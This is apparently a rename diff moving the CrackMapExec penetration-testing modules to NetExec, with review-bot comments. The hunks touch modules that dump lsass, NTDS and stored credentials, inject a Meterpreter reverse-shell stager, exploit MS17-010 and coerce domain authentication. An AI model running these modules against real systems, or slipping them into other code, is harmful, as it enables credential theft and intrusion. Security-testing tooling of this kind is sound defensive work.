description = "Dump lsass recursively from a given hash using BH to find local admins" description = "Dump lsass recursively from a given hash using BH to find local admins"
supported_protocols = ["smb"] supported_protocols = ["smb"]
@ -271,8 +271,8 @@ class CMEModule:
exit() exit()
def on_admin_login(self, context, connection): def on_admin_login(self, context, connection):
db_path = connection.config.get("CME", "workspace") db_path = connection.config.get("nxc", "workspace")
# DB will be saved at ./CrackMapExec/hash_spider_default.sqlite3 if workspace in cme.conf is "default" # DB will be saved at ./NetExec/hash_spider_default.sqlite3 if workspace in nxc.conf is "default"
db_name = f"hash_spider_{db_path}.sqlite3" db_name = f"hash_spider_{db_path}.sqlite3"
dbconnection = connect(db_name, check_same_thread=False, isolation_level=None) dbconnection = connect(db_name, check_same_thread=False, isolation_level=None)
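Review bot: The rewritten comment in `on_admin_login` now says the database is saved at `./NetExec/hash_spider_default.sqlite3`, but `connect(db_name)` is given a bare relative file name, so the file is created in whatever directory the tool is run from. Judging by the module description this database holds data gathered while dumping lsass, so the comment should state where it really lands, for example `# DB is created in the current working directory as hash_spider_<workspace>.sqlite3`. The method continues outside the hunk.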

File diff suppressed because one or more lines are too long


@ -6,7 +6,7 @@ from impacket.dcerpc.v5 import scmr
from impacket.examples.secretsdump import RemoteOperations from impacket.examples.secretsdump import RemoteOperations
class CMEModule: class nxcModule:
name = "install_elevated" name = "install_elevated"
description = "Checks for AlwaysInstallElevated" description = "Checks for AlwaysInstallElevated"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -1,7 +1,7 @@
from csv import reader from csv import reader
class CMEModule: class nxcModule:
""" """
Search for KeePass-related files and process Search for KeePass-related files and process

View File

@ -7,10 +7,10 @@ from csv import reader
from base64 import b64encode from base64 import b64encode
from io import BytesIO, StringIO from io import BytesIO, StringIO
from xml.etree import ElementTree from xml.etree import ElementTree
from cme.helpers.powershell import get_ps_script from nxc.helpers.powershell import get_ps_script
class CMEModule: class nxcModule:
""" """
Make use of KeePass' trigger system to export the database in cleartext Make use of KeePass' trigger system to export the database in cleartext
References: https://keepass.info/help/v2/triggers.html References: https://keepass.info/help/v2/triggers.html


@ -3,9 +3,9 @@
import json import json
from impacket.ldap import ldapasn1 as ldapasn1_impacket from impacket.ldap import ldapasn1 as ldapasn1_impacket
from cme.protocols.ldap.laps import LDAPConnect, LAPSv2Extract from nxc.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
class CMEModule: class nxcModule:
""" """
Module by technobro refactored by @mpgn (now compatible with LDAP protocol + filter by computer) Module by technobro refactored by @mpgn (now compatible with LDAP protocol + filter by computer)


@ -13,7 +13,7 @@ from asyauth.common.credentials.kerberos import KerberosCredential
from asysocks.unicomm.common.target import UniTarget, UniProto from asysocks.unicomm.common.target import UniTarget, UniProto
class CMEModule: class nxcModule:
""" """
Checks whether LDAP signing and channelbinding are required. Checks whether LDAP signing and channelbinding are required.


@ -11,10 +11,10 @@ from lsassy.impacketfile import ImpacketFile
from lsassy.parser import Parser from lsassy.parser import Parser
from lsassy.session import Session from lsassy.session import Session
from cme.helpers.bloodhound import add_user_bh from nxc.helpers.bloodhound import add_user_bh
class CMEModule: class nxcModule:
name = "lsassy" name = "lsassy"
description = "Dump lsass and parse the result remotely with lsassy" description = "Dump lsass and parse the result remotely with lsassy"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -2,10 +2,10 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from masky import Masky from masky import Masky
from cme.helpers.bloodhound import add_user_bh from nxc.helpers.bloodhound import add_user_bh
class CMEModule: class nxcModule:
name = "masky" name = "masky"
description = "Remotely dump domain user credentials via an ADCS and a KDC" description = "Remotely dump domain user credentials via an ADCS and a KDC"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -4,7 +4,7 @@
from sys import exit from sys import exit
class CMEModule: class nxcModule:
""" """
Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
Module by @byt3bl33d3r Module by @byt3bl33d3r
@ -32,7 +32,7 @@ class CMEModule:
SSL Stager server use https or http (default: https) SSL Stager server use https or http (default: https)
multi/handler method that don't require RAND: multi/handler method that don't require RAND:
Set LHOST and LPORT (called SRVHOST and SRVPORT in CME module options) Set LHOST and LPORT (called SRVHOST and SRVPORT in nxc module options)
Set payload to one of the following (non-exhaustive list): Set payload to one of the following (non-exhaustive list):
windows/x64/powershell_reverse_tcp windows/x64/powershell_reverse_tcp
windows/x64/powershell_reverse_tcp_ssl windows/x64/powershell_reverse_tcp_ssl


@ -9,7 +9,7 @@ import socket
import struct import struct
class CMEModule: class nxcModule:
name = "ms17-010" name = "ms17-010"
description = "MS17-010, /!\ not tested oustide home lab" description = "MS17-010, /!\ not tested oustide home lab"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -1,12 +1,12 @@
# MSOL module for CME # MSOL module for nxc
# Author of the module : https://twitter.com/Daahtk # Author of the module : https://twitter.com/Daahtk
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/ # Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
from sys import exit from sys import exit
from os import path from os import path
from cme.helpers.powershell import get_ps_script from nxc.helpers.powershell import get_ps_script
class CMEModule: class nxcModule:
name = "msol" name = "msol"
description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server" description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -4,7 +4,7 @@
# Romain de Reydellet (@pentest_soka) # Romain de Reydellet (@pentest_soka)
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
class User: class User:
@ -21,7 +21,7 @@ class User:
return f"User({self.username})" return f"User({self.username})"
class CMEModule: class nxcModule:
""" """
Enumerate MSSQL privileges and exploit them Enumerate MSSQL privileges and exploit them
""" """
@ -92,7 +92,7 @@ class CMEModule:
elif target_user.dbowner: elif target_user.dbowner:
self.do_dbowner_privesc(target_user.dbowner, exec_as) self.do_dbowner_privesc(target_user.dbowner, exec_as)
if self.is_admin_user(self.current_username): if self.is_admin_user(self.current_username):
self.context.log.success(f"{self.current_username} is now a sysadmin! " + highlight("({})".format(self.context.conf.get("CME", "pwn3d_label")))) self.context.log.success(f"{self.current_username} is now a sysadmin! " + highlight("({})".format(self.context.conf.get("nxc", "pwn3d_label"))))
def build_exec_as_from_path(self, target_user): def build_exec_as_from_path(self, target_user):
path = [target_user.username] path = [target_user.username]


@ -1,6 +1,6 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
# nanodump module for CME python3 # nanodump module for nxc python3
# author of the module : github.com/mpgn # author of the module : github.com/mpgn
# nanodump: https://github.com/helpsystems/nanodump # nanodump: https://github.com/helpsystems/nanodump
@ -9,11 +9,11 @@ import sys
import os import os
from datetime import datetime from datetime import datetime
from pypykatz.pypykatz import pypykatz from pypykatz.pypykatz import pypykatz
from cme.helpers.bloodhound import add_user_bh from nxc.helpers.bloodhound import add_user_bh
from cme.protocols.mssql.mssqlexec import MSSQLEXEC from nxc.protocols.mssql.mssqlexec import MSSQLEXEC
class CMEModule: class nxcModule:
name = "nanodump" name = "nanodump"
description = "Get lsass dump using nanodump and parse the result with pypykatz" description = "Get lsass dump using nanodump and parse the result with pypykatz"
supported_protocols = ["smb", "mssql"] supported_protocols = ["smb", "mssql"]
@ -36,7 +36,7 @@ class CMEModule:
def options(self, context, module_options): def options(self, context, module_options):
""" """
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\) TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
NANO_PATH Path where nano.exe is on your system (default: /tmp/cme/) NANO_PATH Path where nano.exe is on your system (default: /tmp/nxc/)
NANO_EXE_NAME Name of the nano executable (default: nano.exe) NANO_EXE_NAME Name of the nano executable (default: nano.exe)
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH) DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)
""" """
@ -60,13 +60,13 @@ class CMEModule:
else: else:
if sys.platform == "win32": if sys.platform == "win32":
appdata_path = os.getenv("APPDATA") appdata_path = os.getenv("APPDATA")
if not os.path.exists(appdata_path + "\CME"): if not os.path.exists(appdata_path + "\nxc"):
os.mkdir(appdata_path + "\CME") os.mkdir(appdata_path + "\nxc")
self.nano_path = appdata_path + "\CME\\" self.nano_path = appdata_path + "\nxc\\"
else: else:
if not os.path.exists("/tmp/cme/"): if not os.path.exists("/tmp/nxc/"):
os.mkdir("/tmp/cme/") os.mkdir("/tmp/nxc/")
self.nano_path = "/tmp/cme/" self.nano_path = "/tmp/nxc/"
self.dir_result = self.nano_path self.dir_result = self.nano_path
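Review bot: The bulk rename turns the Windows path literal `"\CME"` into `"\nxc"` in the `sys.platform == "win32"` branch, and `\n` is a newline escape, so the directory that is checked, created and stored in `self.nano_path` becomes the APPDATA path followed by a line feed and `xc` instead of a `\nxc` subfolder. Build the path without backslash literals, e.g. `self.nano_path = os.path.join(appdata_path, "nxc") + os.sep`, and pass the same joined value to the `os.path.exists` and `os.mkdir` calls. Separately, the non-Windows default `/tmp/nxc/` is a fixed name in a world-writable directory that holds the executable to upload and, through `dir_result`, the resulting dumps; a directory under the user's own data path created with a restrictive mode would keep other local users out. The enclosing `options` method starts and ends outside this hunk.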


@ -10,7 +10,7 @@ from impacket.krb5 import constants
from impacket.krb5.types import Principal from impacket.krb5.types import Principal
class CMEModule: class nxcModule:
name = "nopac" name = "nopac"
description = "Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user" description = "Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -5,11 +5,11 @@ import time
from impacket.examples.secretsdump import LocalOperations, NTDSHashes from impacket.examples.secretsdump import LocalOperations, NTDSHashes
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
from cme.helpers.misc import validate_ntlm from nxc.helpers.misc import validate_ntlm
class CMEModule: class nxcModule:
""" """
Dump NTDS with ntdsutil Dump NTDS with ntdsutil
Module by @zblurx Module by @zblurx


@ -6,7 +6,7 @@ from impacket.examples.secretsdump import RemoteOperations
from impacket.dcerpc.v5.rrp import DCERPCSessionError from impacket.dcerpc.v5.rrp import DCERPCSessionError
class CMEModule: class nxcModule:
""" """
Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
Module by @Tw1sm Module by @Tw1sm


@ -19,7 +19,7 @@ from impacket.dcerpc.v5.rpcrt import (
from impacket.uuid import uuidtup_to_bin from impacket.uuid import uuidtup_to_bin
class CMEModule: class nxcModule:
name = "petitpotam" name = "petitpotam"
description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam" description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam"
supported_protocols = ["smb"] supported_protocols = ["smb"]

File diff suppressed because one or more lines are too long


@ -16,7 +16,7 @@ KNOWN_PROTOCOLS = {
} }
class CMEModule: class nxcModule:
""" """
Check if vulnerable to printnightmare Check if vulnerable to printnightmare
Module by @mpgn_x64 based on https://github.com/ly4k/PrintNightmare Module by @mpgn_x64 based on https://github.com/ly4k/PrintNightmare

File diff suppressed because one or more lines are too long


@ -7,11 +7,11 @@ from math import fabs
import re import re
class CMEModule: class nxcModule:
''' '''
Created by fplazar and wanetty Created by fplazar and wanetty
Module by @gm_eduard and @ferranplaza Module by @gm_eduard and @ferranplaza
Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py Based on: https://github.com/juliourena/NetExec/blob/master/nxc/modules/get_description.py
''' '''
name = 'pso' name = 'pso'
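Review bot: The attribution link in the class docstring was rewritten by the rename from `juliourena/CrackMapExec/blob/master/cme/modules/get_description.py` to `juliourena/NetExec/blob/master/nxc/modules/get_description.py`, but it points at a third-party repository that this commit does not rename, so the new URL most likely no longer resolves. Keep the original URL on the "Based on:" line so the credit stays traceable, and check the other external links touched by the search-and-replace for the same problem. The class body continues outside this hunk.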


@ -7,10 +7,10 @@ from dploot.triage.backupkey import BackupkeyTriage
from dploot.lib.target import Target from dploot.lib.target import Target
from dploot.lib.smb import DPLootSMBConnection from dploot.lib.smb import DPLootSMBConnection
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
class CMEModule: class nxcModule:
name = "rdcman" name = "rdcman"
description = "Remotely dump Remote Desktop Connection Manager (sysinternals) credentials" description = "Remotely dump Remote Desktop Connection Manager (sysinternals) credentials"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -3,7 +3,7 @@
from sys import exit from sys import exit
from cme.connection import dcom_FirewallChecker from nxc.connection import dcom_FirewallChecker
from impacket.dcerpc.v5 import rrp from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations from impacket.examples.secretsdump import RemoteOperations
@ -13,7 +13,7 @@ from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
class CMEModule: class nxcModule:
name = "rdp" name = "rdp"
description = "Enables/Disables RDP" description = "Enables/Disables RDP"
supported_protocols = ["smb" ,"wmi"] supported_protocols = ["smb" ,"wmi"]
@ -31,9 +31,9 @@ class CMEModule:
METHOD wmi(ncacn_ip_tcp)/smb(ncacn_np) (choices: wmi, smb, default is wmi) METHOD wmi(ncacn_ip_tcp)/smb(ncacn_np) (choices: wmi, smb, default is wmi)
OLD For old version system (under NT6, like: server 2003) OLD For old version system (under NT6, like: server 2003)
DCOM-TIMEOUT Set the Dcom connection timeout for WMI method (Default is 10 seconds) DCOM-TIMEOUT Set the Dcom connection timeout for WMI method (Default is 10 seconds)
cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5} nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram} nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram}
cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5} nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
""" """
if not "ACTION" in module_options: if not "ACTION" in module_options:
context.log.fail("ACTION option not specified!") context.log.fail("ACTION option not specified!")


@ -6,7 +6,7 @@ from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations from impacket.examples.secretsdump import RemoteOperations
class CMEModule: class nxcModule:
name = "reg-query" name = "reg-query"
description = "Performs a registry query on the machine" description = "Performs a registry query on the machine"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -2,7 +2,7 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
class CMEModule: class nxcModule:
name = "runasppl" name = "runasppl"
description = "Check if the registry value RunAsPPL is set or not" description = "Check if the registry value RunAsPPL is set or not"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -80,7 +80,7 @@ def searchResEntry_to_dict(results):
return data return data
class CMEModule: class nxcModule:
name = "get-network" name = "get-network"
description = "" description = ""
supported_protocols = ["ldap"] supported_protocols = ["ldap"]
@ -183,7 +183,7 @@ class CMEModule:
) )
context.log.highlight("Found %d records" % len(outdata)) context.log.highlight("Found %d records" % len(outdata))
path = expanduser("~/.cme/logs/{}_network_{}.log".format(connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S"))) path = expanduser("~/.nxc/logs/{}_network_{}.log".format(connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
with codecs.open(path, "w", "utf-8") as outfile: with codecs.open(path, "w", "utf-8") as outfile:
for row in outdata: for row in outdata:
if self.showhosts: if self.showhosts:


@ -5,7 +5,7 @@ import ntpath
from sys import exit from sys import exit
class CMEModule: class nxcModule:
""" """
Original idea and PoC by Mubix "Rob" Fuller Original idea and PoC by Mubix "Rob" Fuller
URL: https://room362.com/post/2016/smb-http-auth-capture-via-scf/ URL: https://room362.com/post/2016/smb-http-auth-capture-via-scf/


@ -14,10 +14,10 @@ from impacket.dcerpc.v5.rpcrt import (
RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_GSS_NEGOTIATE,
) )
from impacket.smbconnection import SessionError from impacket.smbconnection import SessionError
from cme.logger import cme_logger from nxc.logger import nxc_logger
class CMEModule: class nxcModule:
name = "shadowcoerce" name = "shadowcoerce"
description = "Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam" description = "Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam"
supported_protocols = ["smb"] supported_protocols = ["smb"]
@ -229,7 +229,7 @@ class CoerceAuth:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost) rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE) dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
cme_logger.info("Connecting to %s" % binding_params[pipe]["stringBinding"]) nxc_logger.info("Connecting to %s" % binding_params[pipe]["stringBinding"])
try: try:
dce.connect() dce.connect()
@ -239,20 +239,20 @@ class CoerceAuth:
dce.disconnect() dce.disconnect()
return 1 return 1
cme_logger.debug("Something went wrong, check error status => %s" % str(e)) nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
cme_logger.info("Connected!") nxc_logger.info("Connected!")
cme_logger.info("Binding to %s" % binding_params[pipe]["UUID"][0]) nxc_logger.info("Binding to %s" % binding_params[pipe]["UUID"][0])
try: try:
dce.bind(uuidtup_to_bin(binding_params[pipe]["UUID"])) dce.bind(uuidtup_to_bin(binding_params[pipe]["UUID"]))
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s" % str(e)) nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
cme_logger.info("Successfully bound!") nxc_logger.info("Successfully bound!")
return dce return dce
def IsPathShadowCopied(self, dce, listener): def IsPathShadowCopied(self, dce, listener):
cme_logger.debug("Sending IsPathShadowCopied!") nxc_logger.debug("Sending IsPathShadowCopied!")
try: try:
request = IsPathShadowCopied() request = IsPathShadowCopied()
# only NETLOGON and SYSVOL were detected working here # only NETLOGON and SYSVOL were detected working here
@ -261,14 +261,14 @@ class CoerceAuth:
# request.dump() # request.dump()
dce.request(request) dce.request(request)
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s", str(e)) nxc_logger.debug("Something went wrong, check error status => %s", str(e))
cme_logger.debug("Attack may of may not have worked, check your listener...") nxc_logger.debug("Attack may of may not have worked, check your listener...")
return False return False
return True return True
def IsPathSupported(self, dce, listener): def IsPathSupported(self, dce, listener):
cme_logger.debug("Sending IsPathSupported!") nxc_logger.debug("Sending IsPathSupported!")
try: try:
request = IsPathSupported() request = IsPathSupported()
# only NETLOGON and SYSVOL were detected working here # only NETLOGON and SYSVOL were detected working here
@ -276,8 +276,8 @@ class CoerceAuth:
request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener
dce.request(request) dce.request(request)
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s", str(e)) nxc_logger.debug("Something went wrong, check error status => %s", str(e))
cme_logger.debug("Attack may of may not have worked, check your listener...") nxc_logger.debug("Attack may of may not have worked, check your listener...")
return False return False
return True return True
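Review bot: In the `@ -239,20 +239,20 @` hunk the `except Exception as e:` around `dce.bind(...)` only writes a debug message, and as far as the flattened indentation shows, execution then falls through to `nxc_logger.info("Successfully bound!")` and `return dce`, so a failed bind is reported as success and the caller receives an unbound handle. The handler should fail explicitly, for example by disconnecting and returning the same failure value the connect path above uses (`return 1`), so the "Successfully bound!" line is reached only on success. While touching these lines, the message `"Attack may of may not have worked, check your listener..."` in `IsPathShadowCopied` and `IsPathSupported` should read "may or may not", and the logger calls would be more consistent if they all used the lazy form `nxc_logger.debug("... => %s", e)`. The connect/bind method starts outside the hunk.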


@ -6,7 +6,7 @@ import ntpath
from sys import exit from sys import exit
class CMEModule: class nxcModule:
""" """
Original idea and PoC by Justin Angel (@4rch4ngel86) Original idea and PoC by Justin Angel (@4rch4ngel86)
Module by @byt3bl33d3r Module by @byt3bl33d3r


@ -6,7 +6,7 @@ import errno
import os import os
import time import time
import traceback import traceback
from cme.protocols.smb.remotefile import RemoteFile from nxc.protocols.smb.remotefile import RemoteFile
from impacket.smb3structs import FILE_READ_DATA from impacket.smb3structs import FILE_READ_DATA
from impacket.smbconnection import SessionError from impacket.smbconnection import SessionError
@ -497,7 +497,7 @@ class SMBSpiderPlus:
self.logger.success("All files processed successfully.") self.logger.success("All files processed successfully.")
class CMEModule: class nxcModule:
""" """
Spider plus module Spider plus module
Module by @vincd Module by @vincd
@ -517,7 +517,7 @@ class CMEModule:
EXCLUDE_EXTS Case-insensitive extension filter to exclude (Default: ico,lnk) EXCLUDE_EXTS Case-insensitive extension filter to exclude (Default: ico,lnk)
EXCLUDE_FILTER Case-insensitive filter to exclude folders/files (Default: print$,ipc$) EXCLUDE_FILTER Case-insensitive filter to exclude folders/files (Default: print$,ipc$)
MAX_FILE_SIZE Max file size to download (Default: 51200) MAX_FILE_SIZE Max file size to download (Default: 51200)
OUTPUT_FOLDER Path of the local folder to save files (Default: /tmp/cme_spider_plus) OUTPUT_FOLDER Path of the local folder to save files (Default: /tmp/nxc_spider_plus)
""" """
self.download_flag = False self.download_flag = False
if any("DOWNLOAD" in key for key in module_options.keys()): if any("DOWNLOAD" in key for key in module_options.keys()):
@ -530,7 +530,7 @@ class CMEModule:
self.exclude_filter = get_list_from_option(module_options.get("EXCLUDE_FILTER", "print$,ipc$")) self.exclude_filter = get_list_from_option(module_options.get("EXCLUDE_FILTER", "print$,ipc$"))
self.exclude_filter = [d.lower() for d in self.exclude_filter] # force case-insensitive self.exclude_filter = [d.lower() for d in self.exclude_filter] # force case-insensitive
self.max_file_size = int(module_options.get("MAX_FILE_SIZE", 50 * 1024)) self.max_file_size = int(module_options.get("MAX_FILE_SIZE", 50 * 1024))
self.output_folder = module_options.get("OUTPUT_FOLDER", os.path.join("/tmp", "cme_spider_plus")) self.output_folder = module_options.get("OUTPUT_FOLDER", os.path.join("/tmp", "nxc_spider_plus"))
def on_login(self, context, connection): def on_login(self, context, connection):
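Review bot: The default `OUTPUT_FOLDER` in `options` is still a fixed name under `/tmp` (`os.path.join("/tmp", "nxc_spider_plus")`), a world-writable location where another local user can pre-create the folder or read the files downloaded from the shares. Since the rename already changes this default, it would be a good moment to move it under the user's own data directory (the page uses `~/.nxc/` for logs elsewhere) and create it with mode `0o700`, updating the `OUTPUT_FOLDER` line in the docstring to match. The code that creates the folder is outside this hunk, so the mode it uses should be confirmed there.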


@ -17,7 +17,7 @@ KNOWN_PROTOCOLS = {
} }
class CMEModule: class nxcModule:
""" """
For printnightmare: detect if print spooler is enabled or not. Then use @cube0x0's project https://github.com/cube0x0/CVE-2021-1675 or Mimikatz from Benjamin Delpy For printnightmare: detect if print spooler is enabled or not. Then use @cube0x0's project https://github.com/cube0x0/CVE-2021-1675 or Mimikatz from Benjamin Delpy
Module by @mpgn_x64 Module by @mpgn_x64


@ -13,7 +13,7 @@ def searchResEntry_to_dict(results):
return data return data
class CMEModule: class nxcModule:
""" """
Retrieves the different Sites and Subnets of an Active Directory Retrieves the different Sites and Subnets of an Active Directory
